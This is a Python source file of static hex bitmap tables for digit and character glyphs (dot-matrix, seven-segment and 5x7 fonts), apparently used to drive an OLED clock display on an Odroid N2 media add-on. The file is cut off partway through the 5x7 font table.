"MIT"
] | 10
|
2019-08-31T23:15:30.000Z
|
2021-11-30T08:53:11.000Z
|
lib/charset.py
|
roidy/script.odroidn2.oled
|
60b91680da8d8918e7dea466cf5e91d9b80e9ca4
|
[
"MIT"
] | 3
|
2020-05-02T11:55:52.000Z
|
2021-03-18T16:13:31.000Z
|
lib/charset.py
|
roidy/script.odroidn2.oled
|
60b91680da8d8918e7dea466cf5e91d9b80e9ca4
|
[
"MIT"
] | 3
|
2021-03-18T08:33:02.000Z
|
2021-03-23T16:06:24.000Z
|
dotmatrix = [[0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0xdb, 0xdb,
0x0, 0xc0, 0xc0, 0x0, 0x18, 0x18, 0x0, 0x3, 0x3, 0x0, 0xdb, 0xdb, 0x6, 0x6, 0x0, 0x30,
0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
[0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0x6c, 0x6c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xdb, 0xdb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
0x30, 0x0, 0x36, 0x36, 0x0, 0x30, 0x30, 0x0, 0x0, 0x0],
[0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0x0, 0x18, 0x18, 0x0, 0x3, 0x3, 0x30, 0x30, 0x0, 0x36,
0x36, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30],
[0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xc3, 0xc3, 0x6, 0x6, 0x0, 0x30,
0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
[0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0x6c, 0x6c, 0x0, 0x0, 0x0, 0xd8, 0xd8,
0x0, 0xc3, 0xc3, 0x0, 0xc0, 0xc0, 0x0, 0xdb, 0xdb, 0x0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x36, 0x36, 0x0, 0x0, 0x0],
[0x6c, 0x6c, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x3, 0x3,
0x0, 0x3, 0x3, 0x0, 0x3, 0x3, 0x0, 0x3, 0x3, 0x0, 0xd8, 0xd8, 0x6, 0x6, 0x0, 0x30,
0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
[0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x0, 0x0, 0xdb, 0xdb,
0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xc0, 0xc0, 0x6, 0x6, 0x0, 0x30,
0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
[0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x6c, 0x6c, 0x0, 0x0,
0x0, 0xc0, 0xc0, 0x0, 0x18, 0x18, 0x0, 0x3, 0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x36,
0x36, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
[0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0xc3, 0xc3,
0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xc3, 0xc3, 0x6, 0x6, 0x0, 0x30,
0x30, 0x0, 0x30, 0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6],
[0x60, 0x60, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0xc, 0xc, 0x0, 0x60, 0x60, 0x3, 0x3,
0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0x18, 0x18, 0x0, 0xdb, 0xdb, 0x0, 0x0, 0x0, 0x30,
0x30, 0x0, 0x30, 0x30, 0x0, 0x6, 0x6, 0x0, 0x0, 0x0],
[0x0, 0x0, 0x0, 0x60, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc3, 0xc3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6,
0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
[14, 3, 18, 11]]
dotmatrixLarge = [[0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0xc0, 0xc0, 0xc0, 0xdd, 0xdd, 0xdd, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c,
0x1c, 0x1c, 0x0, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1,
0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd, 0xdd, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
[0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd,
0xdd, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0],
[0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0xc0, 0xc0, 0xc0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0,
0xc0, 0xc0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c,
0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1d, 0x1d, 0x1d,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c],
[0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0xdc, 0xdc, 0xdc, 0x0,
0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0xc1,
0xc1, 0xc1, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdc, 0xdc, 0xdc, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
[0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xdc, 0xdc, 0xdc, 0x0,
0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdd,
0xdd, 0xdd, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c,
0x1c, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0],
[0xdc, 0xdc, 0xdc, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0x1c, 0x1c, 0x1c, 0x1d, 0x1d, 0x1d, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c,
0x1c, 0x1c, 0x0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd, 0xdd, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
[0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0x0, 0x0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0xc1, 0xc1, 0xc1, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0,
0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x1,
0x1, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdc, 0xdc, 0xdc, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
[0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0xdc, 0xdc, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x1c,
0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0x1, 0x1,
0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
[0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0xc0, 0xc0, 0xc0, 0x1d, 0x1d, 0x1d, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0,
0xc0, 0xc0, 0x0, 0x1d, 0x1d, 0x1d, 0xdc, 0xdc, 0xdc, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x1,
0x1, 0x0, 0x1, 0x1, 0x1, 0x0, 0xdc, 0xdc, 0xdc, 0x1, 0x1, 0x1, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1],
[0xc0, 0xc0, 0xc0, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1c, 0x1c, 0x1c, 0x0,
0xc0, 0xc0, 0xc0, 0x1d, 0x1d, 0x1d, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0xc0,
0xc0, 0xc0, 0x0, 0xdd, 0xdd, 0xdd, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x1,
0x1, 0x0, 0xc1, 0xc1, 0xc1, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x1c,
0x0, 0x1c, 0x1c, 0x1c, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0, 0x0, 0x0],
[0x0, 0x0, 0xc0, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0x1d, 0x1d, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xdc, 0xdc, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
[19, 4, 22, 10]]
sevenSeg = [[0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
0xc3, 0xe7, 0xc3, 0x81, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x81, 0xc3, 0xe7, 0xc3,
0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
[0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0xf8, 0xfc, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x81, 0xc3, 0xe7, 0xc3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x1f, 0x3f, 0x1f],
[0x0, 0x0, 0x2, 0x7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
0xc0, 0xe0, 0xd8, 0xbc, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3d, 0x1b, 0x7, 0x3,
0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xe0, 0x40, 0x0, 0x0],
[0x0, 0x0, 0x2, 0x7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
0x0, 0x0, 0x18, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
0x0, 0x0, 0x40, 0xe0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
[0xf8, 0xfc, 0xf8, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0xf8, 0xfc, 0xf8,
0x3, 0x7, 0x1b, 0x3d, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x1f, 0x3f, 0x1f],
[0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0x7, 0x2, 0x0, 0x0,
0x3, 0x7, 0x1b, 0x3d, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbc, 0xd8, 0xe0, 0xc0,
0x0, 0x0, 0x40, 0xe0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
[0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0x7, 0x2, 0x0, 0x0,
0xc3, 0xe7, 0xdb, 0xbd, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbc, 0xd8, 0xe0, 0xc0,
0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
[0x0, 0x0, 0x2, 0x7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x81, 0xc3, 0xe7, 0xc3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x1f, 0x3f, 0x1f],
[0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
0xc3, 0xe7, 0xdb, 0xbd, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
0x1f, 0x3f, 0x5f, 0xef, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
[0xf8, 0xfc, 0xfa, 0xf7, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf, 0xf7, 0xfa, 0xfc, 0xf8,
0x3, 0x7, 0x1b, 0x3d, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0xbd, 0xdb, 0xe7, 0xc3,
0x0, 0x0, 0x40, 0xe0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xf0, 0xef, 0x5f, 0x3f, 0x1f],
[0x0, 0x0, 0x80, 0xc0, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x81, 0xc3, 0x81, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x3, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0],
[16, 3, 18, 9]]
sevenSegLarge = [[0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
0xc0, 0x3f, 0x7f, 0x3f, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x3f,
0x7f, 0x3f, 0xfc, 0xfe, 0xfc, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0xfc, 0xfe, 0xfc, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x39, 0x13, 0x7, 0x3],
[0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xe0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x3f,
0x7f, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x3, 0x7, 0x3],
[0x0, 0x0, 0x8, 0x1c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
0xc0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
0x7f, 0x3f, 0xfc, 0xfe, 0xfc, 0xf9, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x1,
0x0, 0x0, 0x0, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x38, 0x10, 0x0, 0x0],
[0x0, 0x0, 0x8, 0x1c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
0xc0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
0x7f, 0x3f, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x10, 0x38, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x39, 0x13, 0x7, 0x3],
[0xc0, 0xe0, 0xc0, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x80, 0xc0, 0xe0,
0xc0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
0x7f, 0x3f, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x3, 0x7, 0x3],
[0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x1c, 0x8, 0x0,
0x0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x10, 0x38, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x39, 0x13, 0x7, 0x3],
[0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x1c, 0x8, 0x0,
0x0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x80, 0x0,
0x0, 0x0, 0xfc, 0xfe, 0xfc, 0xf9, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
0xfc, 0xfe, 0xfc, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x39, 0x13, 0x7, 0x3],
[0x0, 0x0, 0x8, 0x1c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x3f,
0x7f, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf8,
0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x3, 0x7, 0x3],
[0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
0xc0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
0x7f, 0x3f, 0xfc, 0xfe, 0xfc, 0xf9, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
0xfc, 0xfe, 0xfc, 0x3, 0x7, 0x13, 0x39, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x39, 0x13, 0x7, 0x3],
[0xc0, 0xe0, 0xc8, 0x9c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x9c, 0xc8, 0xe0,
0xc0, 0x3f, 0x7f, 0x3f, 0x9f, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0xc0, 0x9f, 0x3f,
0x7f, 0x3f, 0x0, 0x0, 0x0, 0x1, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0x3, 0xf9,
0xfc, 0xfe, 0xfc, 0x0, 0x0, 0x10, 0x38, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c, 0x3c,
0x39, 0x13, 0x7, 0x3],
[0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x8, 0x1c, 0x1c, 0x8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x10, 0x38, 0x38, 0x10, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0],
[17, 4, 23, 9]]
# Pixel width, Pixel Height, Byte height, Pixel stride, Colon stride
fiveBySevenFullset = [[5, 7, 1, 6, 0],
[0x3e, 0x51, 0x49, 0x45, 0x3e],
[0x0, 0x42, 0x7f, 0x40, 0x0],
[0x42, 0x61, 0x51, 0x49, 0x46],
[0x21, 0x41, 0x45, 0x4b, 0x31],
[0x18, 0x14, 0x12, 0x7f, 0x10],
[0x27, 0x45, 0x45, 0x45, 0x39],
[0x3c, 0x4a, 0x49, 0x49, 0x30],
[0x1, 0x71, 0x9, 0x5, 0x3],
[0x36, 0x49, 0x49, 0x49, 0x36],
[0x6, 0x49, 0x49, 0x29, 0x1e],
[0x7e, 0x11, 0x11, 0x11, 0x7e],
[0x7f, 0x49, 0x49, 0x49, 0x36],
[0x3e, 0x41, 0x41, 0x41, 0x22],
[0x7f, 0x41, 0x41, 0x41, 0x3e],
[0x7f, 0x49, 0x49, 0x49, 0x41],
[0x7f, 0x9, 0x9, 0x9, 0x1],
[0x3e, 0x41, 0x49, 0x49, 0x7a],
[0x7f, 0x8, 0x8, 0x8, 0x7f],
[0x0, 0x41, 0x7f, 0x41, 0x0],
[0x20, 0x40, 0x41, 0x3f, 0x1],
[0x7f, 0x8, 0x14, 0x22, 0x41],
[0x7f, 0x40, 0x40, 0x40, 0x40],
